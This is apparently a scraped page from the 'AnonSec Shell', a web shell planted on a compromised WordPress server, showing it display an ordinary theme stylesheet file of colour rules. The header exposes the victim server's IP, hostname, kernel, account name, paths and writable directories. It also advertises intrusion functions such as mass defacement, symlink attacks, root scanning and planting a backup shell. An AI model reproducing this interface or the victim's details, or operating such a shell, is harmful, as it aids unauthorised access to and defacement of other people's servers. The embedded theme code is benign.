AnonSec Shell
Server IP : 144.76.79.100  /  Your IP : 216.73.216.103   [ Reverse IP ]
Web Server : Apache
System : Linux ch05.wehostwebserver.com 5.14.0-611.5.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Nov 11 08:09:09 EST 2025 x86_64
User : razzlestore ( 1092)
PHP Version : 8.2.29
Disable Function : NONE
Domains : 343 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/razzlestore/public_html/wp-content/themes/zugan/inc/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /home/razzlestore/public_html/wp-content/themes/zugan/inc/variable-style-elementor.php
<?php
/**
 * @author  RadiusTheme
 * @since   1.0
 * @version 1.0
 */

$primary_color     = ZuganTheme::$options['primary_color']; // #111111
$primary_rgb       = ZuganTheme_Helper::hex2rgb( $primary_color ); // 17, 17, 17
$secondary_color   = ZuganTheme::$options['secondary_color']; // #646464
$secondary_rgb     = ZuganTheme_Helper::hex2rgb( $secondary_color ); // 100, 100, 100

/*---------------------------------    
INDEX
===================================
#. Button
#. Section Title
#. Slider
#. Owl Nav 1
#. Owl Nav 2
#. Owl Nav 3
#. Owl Nav 4
#. Testimonial Slider 1
#. About
#. Text With Button
#. Post
#. Info Text
#. CTA
#. Portfolio
#. Team
#. Counter
#. Others
----------------------------------*/

/*-----------------------
#. Button
------------------------*/
?>
.entry-content .light-button ,
.entry-content .light-button i,
.entry-content a.grid-fill-btn:hover,
.entry-content .rt-grid-fill-btn a.grid-fill-btn:hover,
.entry-content .rt-text-with-btn a.light-box:hover {
	color: <?php echo esc_html($primary_color); ?> !important;
}
.multiscroll-wrapper .ms-left .left-slide .item-btn,
.title-text-button .rtin-dark .zugan-button:hover {
	color: <?php echo esc_html($primary_color); ?>;
}
.entry-content a.grid-fill-btn,
.entry-content .rt-grid-fill-btn a.grid-fill-btn,
.dark-button {
	border-color: <?php echo esc_html($primary_color); ?>;
	background: <?php echo esc_html($primary_color); ?>;
}
.entry-content .rt-text-with-btn a.light-box,
.multiscroll-wrapper .ms-left .left-slide .item-btn:hover {
    background: <?php echo esc_html($primary_color); ?>;
}
.zugan-button-1 {
	color: <?php echo esc_html($primary_color); ?> !important;
	border-color: <?php echo esc_html($primary_color); ?>;
}
.rt-owl-nav-1.slider-nav-enabled .owl-carousel .owl-nav > div,
.title-text-button .rtin-dark .zugan-button {
	border-color: <?php echo esc_html($primary_color); ?>;
	background: <?php echo esc_html($primary_color); ?>;
}
.ig-block .instagallery-actions .igact-instalink {
    background: <?php echo esc_html($primary_color); ?> !important;
}
.ig-block .instagallery-actions .igact-instalink:hover {
    background: <?php echo esc_html($secondary_color); ?> !important;
}
.multiscroll-wrapper .ms-left .left-slide1 .item-btn {
	border-color: <?php echo esc_html($primary_color); ?>;
}
.multiscroll-wrapper .ms-left .left-slide1 .item-btn:hover {
	background: <?php echo esc_html($primary_color); ?>;
}

<?php
/*-----------------------
#. Section Title
------------------------*/
?>
.rt-vc-title-1 h2::after,
.rt-vc-title h2:after ,
.section-title h2:after {
	background: <?php echo esc_html($primary_color); ?>;
}
.sec-title.style2 .section-title span {
	color: <?php echo esc_html($primary_color); ?>;
}
<?php
/*-----------------------
#. Slider
------------------------*/
?>
.slider-left-side-content .side-content,
.slider-right-side-content ul.footer-social li a,
.multiscroll-wrapper .ms-social-link li a,
.fullpage-wrapper .fullpage-scroll-content .item-btn:hover,
.multiscroll-wrapper .ms-copyright a:hover {
	color: <?php echo esc_html($primary_color); ?>;
}
.multiscroll-wrapper .ms-social-link li a:hover,
.slider-right-side-content ul.footer-social li a:hover {
	color: <?php echo esc_html($secondary_color); ?>;
}
.fps-menu-list li.active a,
.ms-menu-list li a {
	color: <?php echo esc_html($primary_color); ?>;
}
<?php
/*-----------------------
#. About
------------------------*/
?>
.about-layout-style1 .about-content .sub-rtin-title span {
	color: <?php echo esc_html($primary_color); ?>;
}
.title-text-button .rtin-light .zugan-button {
	color: <?php echo esc_html($primary_color); ?>;
}
.rtin-contact-address h4 {
	color: <?php echo esc_html($primary_color); ?>;
}
<?php
/*-------------------------------------
#. Owl Nav 1
---------------------------------------*/
?>
.rt-el-slider .nivo-controlNav .nivo-control.active {
  background-color: <?php echo esc_html($primary_color); ?>;
}
.rt-owl-nav-1.slider-dot-enabled .owl-carousel .owl-dots .owl-dot:hover span,
.rt-owl-nav-1.slider-dot-enabled .owl-carousel .owl-dots .owl-dot.active span {
  background: <?php echo esc_html($primary_color); ?>;
}
.rt-owl-nav-1.slider-nav-enabled .owl-carousel .owl-nav > div:hover {
  color: <?php echo esc_html($primary_color); ?>;
  border-color: <?php echo esc_html($primary_color); ?>;
}

<?php
/*-------------------------------------
#. Owl Nav 2
---------------------------------------*/
?>
.rt-owl-nav-2.slider-dot-enabled .owl-carousel .owl-dot:hover span ,
.rt-owl-nav-2.slider-dot-enabled .owl-carousel .owl-dot.active span {
  background: <?php echo esc_html($primary_color); ?>;
}
.rt-owl-nav-2.slider-nav-enabled .owl-carousel .owl-nav > div:hover {
  background: <?php echo esc_html($primary_color); ?>;
  border-color: <?php echo esc_html($primary_color); ?>;
}

<?php
/*-------------------------------------
#. Owl Nav 3
---------------------------------------*/
?>
.rt-owl-nav-3 .owl-custom-nav .owl-prev {
  color: <?php echo esc_html($primary_color); ?>;
  border: 2px solid <?php echo esc_html($primary_color); ?>;
}
.rt-owl-nav-3 .owl-custom-nav .owl-prev:hover ,
.rt-owl-nav-3 .owl-custom-nav .owl-next:hover {
  background-color: <?php echo esc_html($primary_color); ?>;
}
.rt-owl-nav-3 .owl-custom-nav .owl-next {
  color: <?php echo esc_html($primary_color); ?>;
  border: 2px solid <?php echo esc_html($primary_color); ?>;
}
.rt-owl-nav-3.slider-dot-enabled .owl-carousel .owl-dot span:hover span ,
.rt-owl-nav-3.slider-dot-enabled .owl-carousel .owl-dot.active span {
  background: <?php echo esc_html($primary_color); ?>;
}
.rt-project-slider-one .sub-title {
	color: <?php echo esc_html($primary_color); ?>;
}
.rt-project-slider-one .rtin-projects-box .our-projects-content-holder span {
	background: <?php echo esc_html($primary_color); ?>;
}
.rt-project-slider-one .rtin-projects-box .our-projects-img-holder:before {
    background: rgba(<?php echo esc_html($primary_rgb); ?>, 0.8);	
}
.rt-service-grid-4 .rtin-single-post .rtin-item-image:after {
    background-color: rgba(<?php echo esc_html($primary_rgb); ?>, 0.7);
}
.rt-project-slider-one .rtin-projects-box .our-projects-content-holder h3 a:hover,
.project-gallery1-area .sub-title {
	color: <?php echo esc_html($primary_color); ?>;
}
.rt-service-grid-4 .rtin-single-post:hover .rtin-item-info h3 a ,
.rt-service-grid-4 .rtin-single-post .rtin-item-image a.plus-icon:hover {
	color: <?php echo esc_html($primary_color); ?>;
}
<?php
/*-------------------------------------
#. Portfolio
---------------------------------------*/
?>
ul.about-list li:before,
.portfolio-default-single .rtin-portfolio-content ul li:before,
ul.rtin-portfolio-info .rtin-social li a:hover {
	color: <?php echo esc_html($primary_color); ?>;
}
.rt-portfolio-1 .rtin-item .item-img:after {
	background: <?php echo esc_html($primary_color); ?>;
}
.rt-portfolio-tab a:after {
	background: <?php echo esc_html($primary_color); ?>;
}
.rt-portfolio-2 .rtin-item .item-img:after,
.rt-portfolio-3 .item-img:before,
.rt-portfolio-4 .rtin-item .item-img:after,
.rt-portfolio-5 .rtin-item .rtin-content,
.rt-portfolio-6 .rtin-item .rtin-content,
.rt-portfolio-7 .rtin-item .rtin-content {
	background-color: rgba(<?php echo esc_html($primary_rgb); ?>, 0.8);
}
.rt-portfolio-8 .rtin-item .overlay {
	background-color: rgba(<?php echo esc_html($primary_rgb); ?>, 0.6);
}
.rt-portfolio-3 .rtin-item .rtin-content .rtin-cat a {
	background: <?php echo esc_html($secondary_color); ?>;
}
.portfolio-slider.rt-owl-nav-1.slider-nav-enabled .owl-carousel .owl-nav > div {
	color: <?php echo esc_html($primary_color); ?>;
}
.portfolio-slider.rt-owl-nav-1.slider-nav-enabled .owl-carousel .owl-nav > div:hover {
	color: <?php echo esc_html($secondary_color); ?>;
}
<?php
/*-------------------------------------
#. Team
---------------------------------------*/
?>
.team-grid-default h3.rtin-title a,
.team-grid-default ul.rtin-social li a:hover,
.team-single .rtin-content ul.rtin-social li a:hover {
	color: <?php echo esc_html($primary_color); ?>;
}
.team-grid-default h3.rtin-title a:hover,
.team-grid-default .rtin-designation {
	color: <?php echo esc_html($secondary_color); ?>;
}
<?php
/*-------------------------------------
#. Testimonial Slider
---------------------------------------*/
?>
.rtin-testimonial-1 .rtin-title,
.rtin-testimonial-2 .rtin-title {
  color: <?php echo esc_html($primary_color); ?>;
}

<?php
/*-------------------------------------
#. Post
---------------------------------------*/
?>
.post-grid-1 .post-content .blog-cat a:hover,
.post-grid-1 .post-content .post-meta ul li a:hover,
.post-grid-2 .rtin-single-post .post-meta ul li a:hover,
.post-grid-2 .rtin-single-post .post-meta ul li i,
.post-grid-1 .post-content i {
	color: <?php echo esc_html($primary_color); ?>;
}
.post-grid-1 .post-content .post-meta ul li a,
.post-grid-1 .post-content h3 a:hover {
	color: <?php echo esc_html($secondary_color); ?>;
}
.post-grid-2 .rtin-single-post .rtin-content h3 a:hover {
  color: <?php echo esc_html($secondary_color); ?>;
}
<?php
/*-------------------------------------
#. Info Text
---------------------------------------*/
?>
.info-box-1 .item-sl .rtin-item-title a:hover,
.info-box-2 .rtin-item .rtin-item-title a:hover {
  color: <?php echo esc_html($primary_color); ?>;
}
.rtin-contact-info ul li i {
  color: <?php echo esc_html($primary_color); ?>;
}
<?php
/*-----------------------
#. CTA
------------------------*/
?>
.rt-text-advertise h2 span,
.rt-cta-1 .rtin-cta-contact-button a:hover {
	color: <?php echo esc_html($primary_color); ?>;
}
.rt-cta-2 .rtin-cta-right:before ,
.rt-cta-2 .rtin-cta-right {	
  background-color: <?php echo esc_html($primary_color); ?>;
}
<?php
/*--------------------------------------
#. Counter
---------------------------------------*/
?>
.rt-vc-counter-4 .awards-box a {
	border-color: <?php echo esc_html( $primary_color );?>;
}
.rt-vc-counter-4 .awards-box a i {
	background: <?php echo esc_html( $primary_color );?>;
}
<?php
/*------------------------------
#. Others
--------------------------------*/
?>
.fixed-sidebar-addon .elementor-widget-wp-widget-nav_menu ul > li > a:hover,
.fixed-sidebar-addon .rt-about-widget .footer-social li a:hover {
    color: <?php echo esc_html( $primary_color ); ?>;
}

.rt-post-vc-section-6 .rtin-single-post .rtin-item-info .rtin-post-date,
.rt-post-vc-section-6 .rtin-single-post:hover .rtin-item-info h3 a {
    color: <?php echo esc_html( $primary_color ); ?>;
}
.rt-cat-list-widget li:before,
.rt-team-slider-nine .team-box .team-content-holder {
    background: <?php echo esc_html( $primary_color );?>;
}

Anon7 - 2022
AnonSec Team